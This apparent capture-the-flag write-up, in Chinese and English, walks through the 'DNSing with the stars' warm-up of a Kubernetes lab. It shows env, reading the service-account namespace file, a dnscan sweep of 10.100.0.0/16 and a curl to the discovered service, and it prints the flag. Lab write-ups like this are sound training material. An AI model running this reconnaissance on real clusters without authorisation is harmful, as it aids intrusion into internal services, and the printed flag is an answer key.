Recon

备注

DNSing with the stars

You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have "loaded your machine with dnscan to ease this process for further challenges.

All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}

你已经获得了对页面底部一个受侵的 Kubernetes Pod 的 shell 访问权限，接下来的目标是进一步攻破其他内部服务。

作为热身，利用 DNS 扫描来发现隐藏的内部服务并获取 flag。为了帮助你完成后续挑战，我们已经在你的机器上预装了 dnscan 工具，以简化这一过程。

本次挑战中的所有旗标（flag）都遵循相同的格式：wiz_k8s_lan_party{*}

在题目提示中，已经说明环境中预装了 dnscan 工具，那么先探测一下环境信息

player@wiz-k8s-lan-party:~$ env
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
USER_ID=39b58ad9-f423-4cd1-a31e-c76545775452
HISTSIZE=2048
PWD=/home/player
HOME=/home/player
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
HISTFILE=/home/player/.bash_history
TMPDIR=/tmp
TERM=xterm-256color
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_PORT=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
HISTFILESIZE=2048
_=/usr/bin/env

player@wiz-k8s-lan-party:~$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
k8s-lan-party

在环境变量信息中，可以得知 Kubernetes 集群的 HOST 为 10.100.0.1

那么直接执行扫描

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
34984 / 65536 [----------------------------------------------------------------------------------->________________________________________________________________________] 53.38% 963 p/s
10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65365 / 65536 [----------------------------------------------------------------------------------------------------------------------------------------------------------->] 99.74% 963 p/s
10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.

得到了一个地址之后，尝试与其进行交互

player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}

即可得到答案

wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}